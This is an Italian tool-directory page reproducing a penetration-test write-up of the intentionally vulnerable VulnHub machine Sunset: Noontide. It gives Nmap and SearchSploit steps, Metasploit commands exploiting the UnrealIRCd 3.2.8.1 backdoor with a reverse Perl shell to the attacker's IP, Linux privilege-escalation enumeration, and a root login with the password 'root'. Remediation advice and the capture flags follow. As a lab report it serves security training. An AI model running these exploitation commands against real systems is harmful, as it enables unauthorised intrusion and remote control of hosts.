Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
sunset-noontide-pentesting — Descrizione Valutazione professionale di penetration testing della macchina VulnHub Sunset: Noontide, che copre ricognizione, enumerazione dei servizi, sfruttamento di CVE-2010-2075, post-sfruttamento, escalation dei privilegi e compromissione completa del sistema. | Kitploit
Strumenti/GitHubGitHub/zales2004/sunset-noontide-pentesting
Escalation di PrivilegiRicognizioneScansione PorteAnalisi delle VulnerabilitàExploitPost-ExploitSicurezza di ReteCTFPenetration Testing

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Apprendimento e Formazione
Red Teaming
Lab e Pratica
GitHubzales2004/sunset-noontide-pentesting

sunset-noontide-pentesting

Descrizione Valutazione professionale di penetration testing della macchina VulnHub Sunset: Noontide, che copre ricognizione, enumerazione dei servizi, sfruttamento di CVE-2010-2075, post-sfruttamento, escalation dei privilegi e compromissione completa del sistema.

Vedi Repository
9h 6m faNon ancora revisionato

Sunset: Noontide — Penetration Testing

Una valutazione professionale di penetration testing e walkthrough CTF di Sunset: Noontide, una macchina intenzionalmente vulnerabile di VulnHub.

Questo progetto documenta il ciclo di vita completo del penetration testing, inclusi ricognizione, enumerazione dei servizi, ricerca delle vulnerabilità, sfruttamento, accesso iniziale, post-sfruttamento, escalation dei privilegi, prova di compromissione, valutazione del rischio, mappatura MITRE ATT&CK e remediation.

⚠️ Disclaimer: Questa valutazione è stata eseguita contro una macchina intenzionalmente vulnerabile in un ambiente di laboratorio autorizzato. Le tecniche e i comandi documentati qui sono destinati esclusivamente a sistemi per i quali è stata ottenuta un'autorizzazione esplicita.


🎯 Obiettivi

  • Identificare l'host di destinazione
  • Enumerare i servizi esposti
  • Identificare software e versioni vulnerabili
  • Ricercare le vulnerabilità applicabili
  • Sfruttare il servizio vulnerabile
  • Ottenere l'accesso iniziale alla shell
  • Eseguire l'enumerazione post-sfruttamento su Linux
  • Identificare le opportunità di escalation dei privilegi
  • Ottenere l'accesso a livello root
  • Recuperare i file di prova utente e root
  • Documentare i risultati di sicurezza
  • Fornire raccomandazioni di remediation

🖥️ Ambiente di Laboratorio

ComponenteDettagli
TargetSunset: Noontide
PiattaformaVulnHub
IP Target10.106.186.186
Hostname Targetnoontide
OS TargetDebian GNU/Linux 10 (Buster)
Architetturax86_64
Piattaforma AttaccanteKali Linux
IP Attaccante10.106.186.204
Tipo di ValutazioneValutazione di Laboratorio Autorizzata
Rischio ComplessivoCRITICO
Risultato della ValutazioneCompromissione Totale del Sistema

🔐 Catena di Attacco

Target Discovery → Enumerazione Nmap → UnrealIRCd 3.2.8.1 Identificato → SearchSploit → CVE-2010-2075 Identificato → Sfruttamento con Metasploit → Shell di Comando Remota → Shell come server → Post-Sfruttamento Linux → Credenziale Root Debole → su root → UID 0 / Accesso Root → File di Prova Utente e Root


1. Ricognizione

È stata eseguita una scoperta iniziale della rete per identificare il target vulnerabile.

Il target è stato infine identificato come:

10.106.186.186

Durante la ricognizione, 10.106.186.142 è stato identificato come gateway predefinito anziché come target previsto.

Ciò evidenzia l'importanza di identificare correttamente il target prima di eseguire ulteriori test di sicurezza, in particolare in una rete di laboratorio bridged o condivisa.


2. Enumerazione dei Servizi

È stata eseguita la rilevazione dei servizi e delle versioni con Nmap contro il target utilizzando:

nmap -sV 10.106.186.186

Il servizio esposto significativo identificato durante la valutazione è stato:

6667/tcp open irc UnrealIRCd

È stata poi eseguita una scansione più dettagliata utilizzando:

nmap -sC -sV -Pn -p 6667 10.106.186.186

Il servizio è stato identificato come:

UnrealIRCd 3.2.8.1

Il servizio IRC riportava inoltre:

irc.foonet.com

Il servizio UnrealIRCd esposto è diventato la principale superficie di attacco investigata durante la valutazione.


3. Ricerca delle Vulnerabilità

SearchSploit è stato utilizzato per investigare le vulnerabilità documentate pubblicamente associate alla versione di UnrealIRCd scoperta.

Comando:

searchsploit UnrealIRCd 3.2.8.1

Il risultato rilevante è stato:

UnrealIRCd 3.2.8.1 - Backdoor Command Exec

linux/remote/16922.rb

La vulnerabilità è stata identificata come:

CVE-2010-2075

Vulnerabilità

UnrealIRCd 3.2.8.1 Backdoor Command Execution

Gravità

Critica

Tipo di Attacco

Remote Command Execution

Impatto sulla Sicurezza

Lo sfruttamento riuscito del servizio vulnerabile consente a un attaccante di eseguire comandi in remoto sul sistema di destinazione.


4. Sfruttamento con Metasploit

Il servizio IRC vulnerabile è stato sfruttato utilizzando il Metasploit Framework.

Il modulo selezionato è stato:

exploit/unix/irc/unreal_ircd_3281_backdoor

Configurazione di esempio:

use exploit/unix/irc/unreal_ircd_3281_backdoor

set RHOST 10.106.186.186

I tentativi iniziali con il payload non hanno prodotto una sessione utilizzabile.

È stato successivamente selezionato un payload Unix reverse-Perl compatibile:

set payload cmd/unix/reverse_perl

set LHOST 10.106.186.204

set LPORT 4444

run

Metasploit ha riportato che il target appariva vulnerabile e ha aperto con successo una sessione di command-shell.


5. Accesso Iniziale

La shell ottenuta è stata verificata utilizzando:

whoami

Risultato:

server

Ciò ha confermato l'esecuzione riuscita di comandi in remoto come account server.

La directory di lavoro iniziale era:

/home/server/irc/Unreal3.2

A questo punto, la valutazione è passata dallo sfruttamento remoto del servizio all'enumerazione locale post-sfruttamento.


6. Enumerazione Post-Sfruttamento

Dopo aver ottenuto la shell, è stata eseguita l'enumerazione standard di Linux per comprendere l'host compromesso e identificare potenziali percorsi di escalation dei privilegi.

Utente Corrente

Comando:

id

Risultato:

uid=1000(server) gid=1000(server)

L'account era un utente non-root.

Hostname

Comando:

hostname

Risultato:

noontide

Informazioni sul Kernel

Comando:

uname -a

Risultato:

Linux noontide 4.19.0-10-amd64 x86_64

Sistema Operativo

Comando:

cat /etc/os-release

Risultato:

Debian GNU/Linux 10 (buster)

Questi comandi hanno stabilito l'identità corrente, l'hostname, la versione del kernel, il sistema operativo e la configurazione generale del sistema.


7. Enumerazione per l'Escalation dei Privilegi

Sono stati eseguiti diversi controlli standard per l'escalation dei privilegi su Linux.

7.1 Enumerazione SUID

Comando:

find / -perm -4000 -type f 2>/dev/null

Sono stati identificati binari SUID standard come passwd, chsh, mount, umount, su, chfn, newgrp e gpasswd.

Non è stato identificato alcun binario SUID personalizzato o anomalo evidente come vettore di escalation riuscito.


7.2 Enumerazione Sudo

Comando:

sudo -l

Non è stato identificato alcun percorso utile di escalation dei privilegi basato su sudo dall'output disponibile.


7.3 Enumerazione Cron

Comandi:

cat /etc/crontab

ls -la /etc/cron.d/

ls -la /etc/cron.hourly/

ls -la /etc/cron.daily/

ls -la /etc/cron.weekly/

I job pianificati osservati erano job di sistema standard in stile Debian.

Non è stato identificato alcun job cron root scrivibile evidente.


7.4 Enumerazione dei File Scrivibili

Comando:

find / -writable -type f 2>/dev/null | head -100

I risultati iniziali erano principalmente pseudo-file in /proc e non hanno rivelato un vettore pratico di escalation dei privilegi.


7.5 Linux Capabilities

Comando:

getcap -r / 2>/dev/null

Non è stata identificata alcuna escalation dei privilegi utile basata su capability dall'output risultante.


8. Escalation dei Privilegi

Il percorso di escalation dei privilegi riuscito si è basato sulle credenziali root intenzionalmente deboli configurate sulla macchina vulnerabile.

L'account root è stato accessibile utilizzando:

su root

Password:

root

L'accesso root è stato poi verificato utilizzando:

id

Risultato:

uid=0(root) gid=0(root) groups=0(root)

L'identità è stata inoltre confermata utilizzando:

whoami

Risultato:

root

Ciò ha confermato il controllo amministrativo completo del sistema di destinazione.


9. Prova di Compromissione

9.1 Prova a Livello Utente

Il file di prova a livello utente era situato in:

/home/server/local.txt

Comando:

cat /home/server/local.txt

Risultato:

c53c08b5bf2b0801c5d0c24149826a6e


9.2 Prova a Livello Root

Il file di prova a livello root era situato in:

/root/proof.txt

Comando:

cat /root/proof.txt

Risultato:

ab28c8ca8da1b9ffc2d702ac54221105

La prova root ha inoltre restituito:

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

Il recupero di entrambi i file di prova conferma la compromissione riuscita dall'accesso remoto iniziale fino al controllo a livello root.


10. Riepilogo del Rischio

IDRiscontroGravitàImpatto
VULN-01Backdoor UnrealIRCd 3.2.8.1🔴 CriticaRemote Command Execution
VULN-02Credenziali Root Deboli🔴 CriticaCompromissione Amministrativa Completa

11. Riscontri Dettagliati

VULN-01 — Backdoor UnrealIRCd 3.2.8.1

Gravità: Critica

Servizio Interessato: IRC / TCP 6667

Software Interessato: UnrealIRCd 3.2.8.1

CVE: CVE-2010-2075

Tipo di Attacco: Remote Command Execution

Impatto Osservato: Shell remota ottenuta come server

Descrizione

Il servizio UnrealIRCd esposto eseguiva una versione vulnerabile associata a una nota vulnerabilità di command-execution tramite backdoor.

La vulnerabilità è stata identificata tramite l'enumerazione dei servizi e la ricerca con SearchSploit ed è stata sfruttata con successo utilizzando Metasploit.

Impatto sul Business

Un attaccante in grado di raggiungere il servizio IRC vulnerabile potrebbe eseguire comandi in remoto e ottenere accesso non autorizzato all'host.


VULN-02 — Credenziali Root Deboli

Gravità: Critica

Account Interessato: root

Credenziale Osservata: root / root

Impatto Osservato: Accesso amministrativo UID 0

Descrizione

L'account root era configurato con una credenziale estremamente debole.

Dopo aver ottenuto una shell locale come server, l'account root è stato accessibile utilizzando la credenziale debole e verificato con UID 0.

Impatto sul Business

Un attaccante che ottiene l'accesso a una shell locale può utilizzare la credenziale root debole per ottenere il controllo completo del sistema operativo.


12. Mappatura MITRE ATT&CK


13. Raccomandazioni di Remediation

13.1 Rimuovere o Aggiornare UnrealIRCd

Sostituire l'installazione vulnerabile di UnrealIRCd con una release attendibile e supportata.

Verificare l'integrità del software e la provenienza dei pacchetti prima della distribuzione.

13.2 Rimuovere il Software con Backdoor

Se l'integrità o la provenienza del software è incerta, ricostruire il sistema utilizzando supporti di installazione attendibili e pacchetti verificati.

13.3 Eliminare le Credenziali Deboli

Sostituire le credenziali predefinite e deboli con credenziali amministrative forti e uniche.

Non utilizzare password semplici come root.

13.4 Limitare l'Esposizione di IRC

Se IRC è necessario, limitare l'accesso utilizzando:

  • Regole del firewall
  • Segmentazione della rete
  • Accesso VPN
  • Restrizioni basate sull'IP di origine

13.5 Applicare gli Aggiornamenti di Sicurezza

Mantenere un processo documentato di gestione delle patch per il sistema operativo e tutti i servizi esposti.

13.6 Monitorare l'Accesso Privilegiato

Registrare e riesaminare:

  • Autenticazione amministrativa
  • Accesso root
  • Modifiche dei privilegi
  • Attività di autenticazione sospette

14. Metodologia di Penetration Testing


15. Strumenti Utilizzati

  • Nmap — Scoperta della rete ed enumerazione dei servizi
  • SearchSploit — Ricerca di vulnerabilità ed exploit
  • Metasploit Framework — Sfruttamento e stabilimento della sessione
  • Utility da Riga di Comando Linux — Post-sfruttamento ed enumerazione dei privilegi

16. Competenze Dimostrate

  • Network Reconnaissance
  • Host Discovery
  • Port Scanning
  • Service Enumeration
  • Version Identification
  • Vulnerability Assessment
  • CVE Research
  • SearchSploit
  • Metasploit Framework
  • Remote Command Execution
  • Linux Enumeration
  • SUID Enumeration
  • Sudo Enumeration
  • Cron Enumeration
  • Writable File Enumeration
  • Linux Capabilities
  • Credential Security Assessment
  • Privilege Escalation
  • Proof-of-Compromise
  • MITRE ATT&CK Mapping
  • Risk Assessment
  • Security Reporting
  • Remediation Analysis

17. Valutazione Finale

L'host Sunset: Noontide è stato compromesso con successo dall'accesso iniziale alla rete fino al controllo completo a livello root.

La principale vulnerabilità di accesso iniziale è stata la backdoor di UnrealIRCd 3.2.8.1 (CVE-2010-2075).

La vulnerabilità ha fornito l'esecuzione di comandi in remoto e ha prodotto una shell iniziale come account server.

È stata poi eseguita l'enumerazione post-sfruttamento, inclusi i controlli SUID, sudo, cron, file scrivibili, capability Linux, identità, sistema operativo e filesystem.

Questi controlli non hanno identificato la via di escalation riuscita.

L'accesso amministrativo completo è stato infine ottenuto attraverso le credenziali root deboli della macchina.

Il recupero riuscito di entrambi i file di prova a livello utente e root ha confermato la compromissione completa del sistema.

Valutazione Complessiva

CRITICO — Compromissione Totale del Sistema Ottenuta


18. Risultati della Valutazione


19. Report Professionale di Penetration Testing

Un report professionale dettagliato di penetration testing è incluso in questo progetto:

Sunset-Noontide-Penetration-Testing-Report.pdf

Il report contiene:

  • Executive Summary
  • Document Control
  • Scope and Rules of Engagement
  • Risk Summary
  • Attack Path
  • Reconnaissance
  • Service Enumeration
  • Vulnerability Research
  • Metasploit Exploitation
  • Initial Access
  • Post-Exploitation
  • Privilege Escalation
  • Evidence and Proof Files
  • Detailed Findings
  • MITRE ATT&CK Mapping
  • Remediation Recommendations
  • Final Assessment

20. Evidenze

Struttura suggerita del repository:

sunset-noontide-pentesting/

├── README.md

├── Sunset-Noontide-Penetration-Testing-Report.pdf

└── evidence/

├── 01-target-discovery.png

├── 02-nmap-enumeration.png

├── 03-searchsploit.png

├── 04-metasploit-exploitation.png

├── 05-initial-shell.png

├── 06-post-exploitation.png

├── 07-privilege-escalation.png

└── 08-root-proof.png

Gli screenshot devono contenere solo informazioni provenienti dall'ambiente di laboratorio autorizzato.


21. Lezioni Apprese

Questa valutazione ha fornito esperienza pratica in:

  1. Identificare correttamente il target previsto in un ambiente di rete.
  2. Eseguire l'enumerazione dei servizi e delle versioni con Nmap.
  3. Ricercare vulnerabilità utilizzando SearchSploit.
  4. Selezionare un modulo exploit Metasploit appropriato.
  5. Risolvere problemi di compatibilità dei payload.
  6. Stabilire una shell di comando remota.
  7. Eseguire l'enumerazione post-sfruttamento su Linux.
  8. Verificare sistematicamente i vettori comuni di escalation dei privilegi.
  9. Identificare credenziali amministrative deboli.
  10. Verificare la compromissione a livello root.
  11. Raccogliere evidenze di proof-of-compromise.
  12. Documentare le vulnerabilità in un formato professionale di penetration testing.

22. ⚠️ Disclaimer Legale ed Etico

Questo repository è destinato esclusivamente a:

  • Educazione alla cybersecurity
  • Penetration testing autorizzato
  • Pratica CTF
  • Ricerca sulle vulnerabilità
  • Ambienti di laboratorio

Le tecniche documentate in questo repository devono essere eseguite solo contro sistemi per i quali è stata ottenuta un'autorizzazione esplicita.

Non utilizzare queste tecniche contro sistemi di produzione, infrastrutture pubbliche o sistemi di terze parti senza autorizzazione.


👨‍💻 Autore

Alen Sales K S

Cybersecurity | Penetration Testing | SOC | Network Security

GitHub: https://github.com/zales2004


⭐ Riepilogo del Progetto

Sunset: Noontide dimostra un flusso di lavoro completo di penetration testing:

Ricognizione → Enumerazione → Ricerca delle Vulnerabilità → Sfruttamento → Accesso Iniziale → Post-Sfruttamento → Escalation dei Privilegi → Accesso Root → Raccolta delle Prove → Valutazione del Rischio → Reporting di Sicurezza

Risultato della Valutazione: CRITICO — Compromissione Totale del Sistema Ottenuta

Scarica lo strumento
TecnicaIDAttività Osservata
Network Service ScanningT1046Enumerazione Nmap
Exploit Public-Facing ApplicationT1190Sfruttamento del servizio UnrealIRCd esposto
Command and Scripting InterpreterT1059Shell di comando remota
Valid AccountsT1078Utilizzo delle credenziali root
Account DiscoveryT1087Enumerazione dell'identità e degli utenti
System Information DiscoveryT1082uname e /etc/os-release
File and Directory DiscoveryT1083Enumerazione del filesystem
Scheduled Task/Job DiscoveryT1053Enumerazione cron
Permission Groups DiscoveryT1069id ed enumerazione dei gruppi
FaseAttività
RicognizioneScoperta della rete e identificazione del target
EnumerazioneRilevazione dei servizi/versioni con Nmap
Ricerca delle VulnerabilitàIdentificazione di moduli SearchSploit e Metasploit
SfruttamentoSfruttamento della backdoor UnrealIRCd
Accesso InizialeCommand shell come server
Post-SfruttamentoEnumerazione di identità, OS, filesystem e privilegi
Escalation dei PrivilegiControlli SUID, sudo, cron, file scrivibili e capability
Raccolta delle ProveFile di prova utente e root
ReportingRiscontri, analisi del rischio e remediation
ObiettivoStato
Target Identificato✅ PASS
Servizio Esposto Identificato✅ PASS
Versione Vulnerabile Identificata✅ PASS
CVE Identificato✅ PASS
Remote Command Execution✅ PASS
Shell Iniziale come server✅ PASS
Prova Utente Recuperata✅ PASS
Escalation dei Privilegi✅ PASS
Accesso Root Verificato✅ PASS
Prova Root Recuperata✅ PASS